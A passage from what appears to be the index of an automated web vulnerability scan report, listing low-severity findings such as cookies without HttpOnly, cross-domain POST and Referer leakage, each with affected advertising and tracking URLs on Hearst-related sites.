12.84. http://d.turn.com/r/dm/mkt/4/mpid//mpuid/3716466541868853559/nu/n/url/http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2800%3Fid%3D3716466541868853559

12.85. http://d7.zedo.com/bar/v16-507/d3/jsc/gl.js

12.86. http://d7.zedo.com/img/bh.gif

12.87. http://hearstmagazines.112.2o7.net/b/ss/hmagglobal/1/H.22.1--NS/0

12.88. http://ib.adnxs.com/getuid

12.89. http://ib.adnxs.com/seg

12.90. http://idpix.media6degrees.com/orbserv/hbpix

12.91. http://image2.pubmatic.com/AdServer/Pug

12.92. http://img.pulsemgr.com/optout

12.93. http://leadback.advertising.com/adcedge/lb

12.94. http://load.exelator.com/load/OptOut.php

12.95. http://loadm.exelator.com/load/

12.96. http://nai.btrll.com/nai/optout

12.97. http://notrack.adviva.net/CookieCheck.php

12.98. http://notrack.specificclick.net/CookieCheck.php

12.99. http://notrack.specificmedia.com/CookieCheck.php

12.100. http://oo.afy11.net/NAIOptOut.aspx

12.101. http://optout.33across.com/api/

12.102. http://optout.adlegend.com/nai/optout.php

12.103. http://optout.crwdcntrl.net/optout

12.104. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl

12.105. http://optout.imiclk.com/cgi/optout.cgi

12.106. http://optout.mookie1.decdna.net/optout/nai/

12.107. http://optout.mookie1.decideinteractive.com/optout/nai/

12.108. http://optout.mookie1.dtfssearch.com/optout/nai/

12.109. http://optout.mookie1.pm14.com/optout/nai/

12.110. http://optout.mxptint.net/naioptout.ashx

12.111. http://optout.xgraph.net/optout.gif.jsp

12.112. http://p.brilig.com/contact/optout

12.113. http://pbid.pro-market.net/engine

12.114. http://pix04.revsci.net/F09828/a4/0/0/0.js

12.115. http://pix04.revsci.net/F09828/b3/0/3/1008211/677164118.js

12.116. http://pix04.revsci.net/I09837/b3/0/3/0902121/486412827.js

12.117. http://pix04.revsci.net/I09839/b3/0/3/1008211/194305936.js

12.118. http://pixel.fetchback.com/serve/fb/optout

12.119. http://pixel.quantserve.com/optout_set

12.120. http://pixel.quantserve.com/pixel

12.121. http://pixel.rubiconproject.com/tap.php

12.122. http://privacy.revsci.net/optout/optout.aspx

12.123. http://px.owneriq.net/naioptout

12.124. http://r.openx.net/set

12.125. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/9tOMO

12.126. http://rp.gwallet.com/r1/optout

12.127. http://rs.gwallet.com/r1/pixel/x1743

12.128. http://rt.legolas-media.com/lgrt

12.129. http://s.xp1.ru4.com/coop

12.130. http://sensor2.suitesmart.com/sensor4.js

12.131. http://tag.contextweb.com/TagPublish/GetAd.aspx

12.132. http://tag.contextweb.com/TagPublish/getjs.aspx

12.133. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.15086604817770422/0/in%2Cti/ti.gif

12.134. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.1942676946055144/0/in%2Cti/ti.gif

12.135. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.1974340253509581/0/in%2Cti/ti.gif

12.136. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.2005994024220854/0/in%2Cti/ti.gif

12.137. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.31795264524407685/0/in%2Cti/ti.gif

12.138. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.4155047545209527/0/in%2Cti/ti.gif

12.139. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.5863753461744636/0/in%2Cti/ti.gif

12.140. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.7161733908578753/0/in%2Cti/ti.gif

12.141. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.7414057147689164/0/in%2Cti/ti.gif

12.142. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.8592949255835265/0/in%2Cti/ti.gif

12.143. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9192736572586/0/in%2Cti/ti.gif

12.144. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9203020841814578/0/in%2Cti/ti.gif

12.145. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9359824557323009/0/in%2Cti/ti.gif

12.146. http://www.adadvisor.net/nai/optout

12.147. http://www.adbrite.com/mb/nai_optout.php

12.148. http://www.addthis.com/api/nai/optout

12.149. http://www.bizographics.com/nai/optout

12.150. http://www.burstnet.com/cgi-bin/opt_out.cgi

12.151. http://www.burstnet.com/enlightn/8117//3E06/

12.152. http://www.burstnet.com/enlightn/8171//99D2/

12.153. http://www.foxreno.com/2011/0915/29196544_320X240.jpg

12.154. http://www.local.com/

12.155. http://www.mediaplex.com/optout_pure.php

12.156. http://www.mediaplex.com/optout_pure.php

12.157. http://www.nexac.com/nai_optout.php

12.158. http://www.seventeen.com/cm/shared/images/logos/hearst-teen-logo-white.gif

12.159. http://www2.glam.com/app/site/affiliate/nc/g-optout.act

13. Cookie without HttpOnly flag set

13.1. http://ads.adxpose.com/ads/ads.js

13.2. http://afe.specificclick.net/

13.3. http://afe.specificclick.net/serve/v=5

13.4. http://event.adxpose.com/event.flow

13.5. http://nai.ad.us-ec.adtechus.com/nai/daa.php

13.6. http://nai.adserver.adtechus.com/nai/daa.php

13.7. http://nai.adserverec.adtechus.com/nai/daa.php

13.8. http://nai.adserverwc.adtechus.com/nai/daa.php

13.9. http://nai.adsonar.com/nai/daa.php

13.10. http://nai.adtech.de/nai/daa.php

13.11. http://nai.advertising.com/nai/daa.php

13.12. http://nai.glb.adtechus.com/nai/daa.php

13.13. http://nai.tacoda.at.atwola.com/nai/daa.php

13.14. http://optout.mookie1.com/optout/nai/

13.15. http://pixel.adsafeprotected.com/jspix

13.16. http://syn.verticalacuity.com/varw/getPromo

13.17. http://tag.admeld.com/nai-opt-out

13.18. http://www.gather.com/URI%20SYNTAX%20EXCEPTION

13.19. http://www.stamfordadvocatedailydeals.com/favicon.ico

13.20. http://www.ugo.com/

13.21. http://www.ugo.com/takeover/takeover.js

13.22. http://a.collective-media.net/

13.23. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default

13.24. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home

13.25. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home

13.26. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo

13.27. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default

13.28. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home

13.29. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home

13.30. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo

13.31. http://a.collective-media.net/datapair

13.32. http://a.collective-media.net/favicon.ico

13.33. http://a.netmng.com/hic/

13.34. http://a.netmng.com/opt-out.php

13.35. http://a.raasnet.com/a

13.36. http://a.rfihub.com/nai_opt_out_1.gif

13.37. http://a.tribalfusion.com/j.ad

13.38. http://a.tribalfusion.com/z/i.optout

13.39. http://ad.agkn.com/iframe!t=1089!

13.40. http://ad.doubleclick.net/ad/N4478.hearst.comOX2468/B5477179.4

13.41. http://ad.doubleclick.net/ad/N4478.hearst.comOX2468/B5477179.87

13.42. http://ad.doubleclick.net/ad/N4478.hearst.comOX2468/B5477179.88

13.43. http://ad.doubleclick.net/ad/N5823.131643.MEEBO/B5733109.2

13.44. http://ad.doubleclick.net/ad/N6482.3508.THESEATTLETIMES-POSTI/B5865206

13.45. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5

13.46. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.30

13.47. http://ad.doubleclick.net/adj/DY146/ron_lifestyle

13.48. http://ad.doubleclick.net/adj/N5295.SD128132N5295SN0/B5753751.3

13.49. http://ad.doubleclick.net/adj/hdm.answerology/

13.50. http://ad.doubleclick.net/adj/hdm.donatemydress/

13.51. http://ad.doubleclick.net/adj/hdm.misquincemag/other/

13.52. http://ad.doubleclick.net/adj/hdm.quicksimple/answerology/

13.53. http://ad.doubleclick.net/adj/hdm.quicksimple/other/

13.54. http://ad.doubleclick.net/adj/hdm.seventeen/other/

13.55. http://ad.doubleclick.net/adj/hdm.thedailygreen/other/

13.56. http://ad.doubleclick.net/adj/hfmus.eg.hp/landingpage

13.57. http://ad.doubleclick.net/adj/locm.hp

13.58. http://ad.doubleclick.net/adj/ugo.ugo.ugohome/ugohome

13.59. http://ad.wsod.com/

13.60. http://ad.yieldmanager.com/imp

13.61. http://ad.yieldmanager.com/pixel

13.62. http://admonkey.dapper.net/PixelMonkey

13.63. http://ads.adbrite.com/adserver/vdi/762701

13.64. http://ads.amgdgt.com/ads/opt-out

13.65. http://ads.undertone.com/aj

13.66. http://ads.undertone.com/l

13.67. http://ads.undertone.com/l

13.68. http://adserver.teracent.net/tase/ad

13.69. http://adserver.teracent.net/tase/redir/1316276657094_138127931_as3105_imp/vew

13.70. http://adserver.teracent.net/tase/redir/1316277335242_138208257_as3106_imp/vew

13.71. http://adserver.teracent.net/tase/redir/1316277342661_138301358_as3101_imp/vew

13.72. http://adserver.teracent.net/tase/redir/1316277704500_138214252_as3105_imp/vew

13.73. http://adserver.teracent.net/tase/redir/1316277704500_138372278_as3100_imp/vew

13.74. http://adserver.teracent.net/tase/redir/1316277712246_66815854_as3102_imp/vew

13.75. http://adserver.teracent.net/tase/redir/1316278116134_138322589_as3104_imp/vew

13.76. http://adsfac.us/ag.asp

13.77. http://amch.questionmarket.com/adsc/d926534/6/43407795/decide.php

13.78. http://amch.questionmarket.com/adsc/d926534/6/43407799/decide.php

13.79. http://amch.questionmarket.com/adsc/d926534/6/43407814/decide.php

13.80. http://amch.questionmarket.com/adsc/d927907/35/43624044/decide.php

13.81. http://amch.questionmarket.com/adscgen/dynamiclink.js.php

13.82. http://api.aggregateknowledge.com/optout2

13.83. http://api.agkn.com/optout2

13.84. http://api.choicestream.com/instr/crunch/almondnet/seg

13.85. http://api.twitter.com/1/statuses/user_timeline.json

13.86. http://apis.google.com/js/plusone.js

13.87. http://ar.atwola.com/atd

13.88. http://ats.tumri.net/ats/optout

13.89. http://b.scorecardresearch.com/b

13.90. http://b.scorecardresearch.com/p

13.91. http://b.scorecardresearch.com/r

13.92. http://bh.contextweb.com/bh/rtset

13.93. http://bh.contextweb.com/bh/set.aspx

13.94. http://bing4.com/

13.95. http://c.gigcount.com/wildfire/IMP/CXNID=2000002.11NXC/bT*xJmx*PTEzMTYwOTczNDc5ODkmcHQ9MTMxNjA5NzM1MTA5MSZwPSZkPSZnPTImbz1iZmQ1MzRjYzQzNTQ*NzlmOTk4OWZkNWQ5/MTFkMTUyYiZvZj*w.gif

13.96. http://cdn4.specificclick.net/optout.php

13.97. http://ce.lijit.com/merge

13.98. http://cm.npc-hearst.overture.com/js_1_0/

13.99. http://csc.beap.ad.yieldmanager.net/i

13.100. http://d.agkn.com/iframe!t=747!

13.101. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/9033442320916087634/mchpid/9/url/

13.102. http://d.p-td.com/r/du/id/L21rdC80L3NwaWQvMQ/rnd//url/http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2800%3Fid=PARTNER_UUID

13.103. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzcxNjkzMS90LzI/dpuid/0158d64682f06bf8972b02c9875954d9

13.104. http://d.turn.com/r/dm/mkt/4/mpid//mpuid/3716466541868853559/nu/n/url/http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2800%3Fid%3D3716466541868853559

13.105. http://d7.zedo.com/bar/v16-507/d3/jsc/gl.js

13.106. http://d7.zedo.com/img/bh.gif

13.107. http://data.cmcore.com/imp

13.108. http://domdex.com/nai_optout.php

13.109. http://hearstmagazines.112.2o7.net/b/ss/hmagglobal,hmagthedailygreen/1/H.22.1/s9643802732229

13.110. http://hearstmagazines.112.2o7.net/b/ss/hmagglobal/1/H.22.1--NS/0

13.111. http://hfm.checkm8.com/adam/detect

13.112. http://hfm.checkm8.com/adam/detect

13.113. http://hfm.checkm8.com/adam/detected

13.114. http://idpix.media6degrees.com/orbserv/hbpix

13.115. http://image2.pubmatic.com/AdServer/Pug

13.116. http://img.pulsemgr.com/optout

13.117. http://leadback.advertising.com/adcedge/lb

13.118. http://load.exelator.com/load/OptOut.php

13.119. http://loadm.exelator.com/load/

13.120. http://nai.btrll.com/nai/optout

13.121. http://notrack.adviva.net/CookieCheck.php

13.122. http://notrack.specificclick.net/CookieCheck.php

13.123. http://notrack.specificmedia.com/CookieCheck.php

13.124. http://oo.afy11.net/NAIOptOut.aspx

13.125. http://open.ad.yieldmanager.net/a1

13.126. http://optout.33across.com/api/

13.127. http://optout.adlegend.com/nai/optout.php

13.128. http://optout.crwdcntrl.net/optout

13.129. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl

13.130. http://optout.imiclk.com/cgi/optout.cgi

13.131. http://optout.mookie1.decdna.net/optout/nai/

13.132. http://optout.mookie1.decideinteractive.com/optout/nai/

13.133. http://optout.mookie1.dtfssearch.com/optout/nai/

13.134. http://optout.mookie1.pm14.com/optout/nai/

13.135. http://optout.mxptint.net/naioptout.ashx

13.136. http://optout.xgraph.net/optout.gif.jsp

13.137. http://optout.yieldoptimizer.com/optout/ns

13.138. http://p.brilig.com/contact/optout

13.139. http://pbid.pro-market.net/engine

13.140. http://pix04.revsci.net/F09828/a4/0/0/0.js

13.141. http://pix04.revsci.net/F09828/b3/0/3/1008211/677164118.js

13.142. http://pix04.revsci.net/I09837/b3/0/3/0902121/486412827.js

13.143. http://pix04.revsci.net/I09839/b3/0/3/1008211/194305936.js

13.144. http://pixel.fetchback.com/serve/fb/optout

13.145. http://pixel.quantserve.com/optout_set

13.146. http://pixel.quantserve.com/pixel

13.147. http://pixel.rubiconproject.com/tap.php

13.148. http://privacy.revsci.net/optout/optout.aspx

13.149. http://px.owneriq.net/naioptout

13.150. http://r.openx.net/set

13.151. http://r.skimresources.com/api/

13.152. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/9tOMO

13.153. http://rp.gwallet.com/r1/optout

13.154. http://rs.gwallet.com/r1/pixel/x1743

13.155. http://rt.legolas-media.com/lgrt

13.156. http://s.xp1.ru4.com/coop

13.157. http://sensor2.suitesmart.com/sensor4.js

13.158. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/donatemydress_us

13.159. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us

13.160. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf

13.161. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626

13.162. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642

13.163. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100

13.164. http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686626

13.165. http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686642

13.166. http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61721100

13.167. http://tag.admeld.com/ad/js/610/hearst/300x250/ht_1064834_61686626

13.168. http://tag.admeld.com/match

13.169. http://tag.admeld.com/nai-status

13.170. http://tag.admeld.com/nai-test-opt-out

13.171. http://tag.admeld.com/pixel

13.172. http://tag.contextweb.com/TagPublish/GetAd.aspx

13.173. http://tag.contextweb.com/TagPublish/getjs.aspx

13.174. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.15086604817770422/0/in%2Cti/ti.gif

13.175. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.1942676946055144/0/in%2Cti/ti.gif

13.176. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.1974340253509581/0/in%2Cti/ti.gif

13.177. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.2005994024220854/0/in%2Cti/ti.gif

13.178. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.31795264524407685/0/in%2Cti/ti.gif

13.179. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.4155047545209527/0/in%2Cti/ti.gif

13.180. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.5863753461744636/0/in%2Cti/ti.gif

13.181. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.7161733908578753/0/in%2Cti/ti.gif

13.182. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.7414057147689164/0/in%2Cti/ti.gif

13.183. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.8592949255835265/0/in%2Cti/ti.gif

13.184. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9192736572586/0/in%2Cti/ti.gif

13.185. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9203020841814578/0/in%2Cti/ti.gif

13.186. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9359824557323009/0/in%2Cti/ti.gif

13.187. http://www.adadvisor.net/nai/optout

13.188. http://www.adbrite.com/mb/nai_optout.php

13.189. http://www.addthis.com/api/nai/optout

13.190. http://www.bizographics.com/nai/optout

13.191. http://www.burstnet.com/cgi-bin/opt_out.cgi

13.192. http://www.burstnet.com/enlightn/8117//3E06/

13.193. http://www.burstnet.com/enlightn/8171//99D2/

13.194. http://www.foxreno.com/2011/0915/29196544_320X240.jpg

13.195. http://www.kaboodle.com/

13.196. http://www.kampyle.com/feedback_form/ff-feedback-form.php

13.197. http://www.local.com/

13.198. http://www.mediaplex.com/optout_pure.php

13.199. http://www.mediaplex.com/optout_pure.php

13.200. http://www.nexac.com/nai_optout.php

13.201. http://www.seventeen.com/cm/shared/images/logos/hearst-teen-logo-white.gif

13.202. http://www2.glam.com/app/site/affiliate/nc/g-optout.act

14. Password field with autocomplete enabled

15. ASP.NET debugging enabled

16. Referer-dependent response

16.1. http://a.collective-media.net/optout

16.2. http://adnxs.revsci.net/imp

16.3. http://ads.adbrite.com/adserver/vdi/762701

16.4. http://ads.amgdgt.com/ads/opt-out

16.5. http://ats.tumri.net/ats/optout

16.6. http://c.brightcove.com/services/viewer/federated_f9

16.7. http://hearst.com/images/icon-pointer-roll.gif

16.8. http://hearst.com/images/icon-pointer.gif

16.9. http://optout.collective-media.net/optout/status

16.10. http://pixel.adsafeprotected.com/jspix

16.11. http://www.facebook.com/extern/login_status.php

16.12. http://www.facebook.com/plugins/like.php

16.13. http://www.facebook.com/plugins/likebox.php

16.14. http://www.kaboodle.com/

17. Cross-domain POST

17.1. http://www.delish.com/

17.2. http://www.quickandsimple.com/

17.3. http://www.seventeen.com/

17.4. http://www.thedailygreen.com/

18. Cross-domain Referer leakage

18.1. http://a.netmng.com/hic/

18.2. http://a.tribalfusion.com/j.ad

18.3. http://a.tribalfusion.com/j.ad

18.4. http://a.tribalfusion.com/j.ad

18.5. http://a1.interclick.com/CookieCheck.aspx

18.6. http://a1.interclick.com/optOut.aspx

18.7. http://ad.agkn.com/iframe!t=1089!

18.8. http://ad.agkn.com/iframe!t=1089!

18.9. http://ad.amgdgt.com/ads/

18.10. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3

18.11. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3

18.12. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3

18.13. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3

18.14. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3

18.15. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3

18.16. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3

18.17. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3

18.18. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3

18.19. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5

18.20. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5

18.21. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5

18.22. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5

18.23. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5

18.24. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5

18.25. http://ad.doubleclick.net/adi/N1558.NetMining/B4742075.6

18.26. http://ad.doubleclick.net/adi/N5019.284127.DBGVIDEONETWORK/B5621714

18.27. http://ad.doubleclick.net/adi/N6257.274732.SEATTLEPI-NNN/B5824230.2

18.28. http://ad.doubleclick.net/adi/N6257.274732.SEATTLEPI-NNN/B5824230.2

18.29. http://ad.doubleclick.net/adi/N6257.274732.SEATTLEPI-NNN/B5824230.3

18.30. http://ad.doubleclick.net/adi/N6257.274732.SEATTLEPI-NNN/B5824230.3

18.31. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.30

18.32. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.31

18.33. http://ad.doubleclick.net/adj/N5295.SD128132N5295SN0/B5753751.3

18.34. http://ad.doubleclick.net/adj/N5295.SD128132N5295SN0/B5761718.3

18.35. http://ad.doubleclick.net/adj/hdm.seventeen/other/

18.36. http://ad.doubleclick.net/adj/hdm.seventeen/other/

18.37. http://ad.doubleclick.net/adj/hdm.seventeen/other/

18.38. http://ad.doubleclick.net/adj/hfmus.eg.hp/landingpage

18.39. http://ad.doubleclick.net/adj/hfmus.eg.hp/landingpage

18.40. http://ad.doubleclick.net/adj/hfmus.eg.hp/landingpage

18.41. http://ad.doubleclick.net/adj/hfmus.eg.hp/landingpage

18.42. http://ad.doubleclick.net/adj/hfmus.eg.hp/landingpage

18.43. http://ad.doubleclick.net/adj/locm.hp

18.44. http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/home

18.45. http://ad.doubleclick.net/adj/realage.index/index/other/

18.46. http://ad.doubleclick.net/adj/ugo.ugo.ugohome/ugohome

18.47. http://ad.turn.com/server/ads.js

18.48. http://adsfac.us/ag.asp

18.49. http://adunit.cdn.auditude.com/flash/modules/display/auditudeDisplayLib.js

18.50. http://advertising.aol.com/nai/nai.php

18.51. http://advertising.aol.com/nai/nai.php

18.52. http://advertising.aol.com/nai/nai.php

18.53. http://advertising.aol.com/nai/nai.php

18.54. http://afe.specificclick.net/

18.55. http://afe.specificclick.net/

18.56. http://afe.specificclick.net/

18.57. http://afe.specificclick.net/

18.58. http://afe.specificclick.net/serve/v=5

18.59. http://afe.specificclick.net/serve/v=5

18.60. http://amch.questionmarket.com/adscgen/d_layer.php

18.61. http://as.serving-sys.com/OptOut/nai_optout.aspx

18.62. http://as.serving-sys.com/OptOut/nai_optout_results.aspx

18.63. http://as1.suitesmart.com/102386/G14531.js

18.64. http://choice.atdmt.com/AdvertisementChoice/opt.out

18.65. http://choice.atdmt.com/AdvertisementChoice/opt.out

18.66. http://choice.bing.com/AdvertisementChoice/opt.out

18.67. http://choice.bing.com/AdvertisementChoice/opt.out

18.68. http://choice.live.com/AdvertisementChoice/opt.out

18.69. http://choice.live.com/AdvertisementChoice/opt.out

18.70. http://choice.live.com/AdvertisementChoice/opt.out

18.71. http://choice.live.com/AdvertisementChoice/opt.out

18.72. http://choice.microsoft.com/AdvertisementChoice/opt.out

18.73. http://choice.msn.com/AdvertisementChoice/opt.out

18.74. http://choice.msn.com/AdvertisementChoice/opt.out

18.75. http://choice.msn.com/AdvertisementChoice/opt.out

18.76. http://choices.truste.com/ca

18.77. http://choices.truste.com/ca

18.78. http://cim.meebo.com/cim

18.79. http://cm.g.doubleclick.net/pixel

18.80. http://cm.g.doubleclick.net/pixel

18.81. http://cm.g.doubleclick.net/pixel

18.82. http://cm.g.doubleclick.net/pixel

18.83. http://cm.g.doubleclick.net/pixel

18.84. http://cm.npc-hearst.overture.com/js_1_0/

18.85. http://cm.npc-hearst.overture.com/js_1_0/

18.86. http://cn2.kaboodle.com/ht/scripts/wick.js

18.87. http://contextweb.pixel.invitemedia.com/context_sync

18.88. http://dis.criteo.com/dis/optoutstatus.aspx

18.89. http://dis.criteo.com/dis/optoutstatus.aspx

18.90. http://edge.aperture.displaymarketplace.com/anotnai.gif

18.91. http://edge.aperture.displaymarketplace.com/anotnaistat.gif

18.92. http://fls.doubleclick.net/activityi

18.93. http://googleads.g.doubleclick.net/pagead/ads

18.94. http://googleads.g.doubleclick.net/pagead/ads

18.95. http://googleads.g.doubleclick.net/pagead/ads

18.96. http://img.pulsemgr.com/optout

18.97. http://img.pulsemgr.com/optout

18.98. http://info.yahoo.com/nai/nai-status.html

18.99. http://info.yahoo.com/nai/nai-verify.html

18.100. http://load.exelator.com/load/OptOut.php

18.101. http://loadus.exelator.com/load/

18.102. http://loadus.exelator.com/load/net.php

18.103. http://loadus.exelator.com/load/net.php

18.104. http://media.fastclick.net/nai/remove

18.105. http://media.fastclick.net/nai/verify

18.106. http://oo.afy11.net/NAIIsOptOut.aspx

18.107. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl

18.108. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl

18.109. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl

18.110. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl

18.111. http://optout.ib-ibi.com:8000/VerifyCookieStatus.aspx

18.112. http://optout.ib-ibi.com:8000/VerifyCookieStatus.aspx

18.113. http://optout.mxptint.net/naistatus.ashx

18.114. http://optout.mxptint.net/naistatus.ashx

18.115. http://pbid.pro-market.net/engine

18.116. http://platform.twitter.com/widgets/follow_button.html

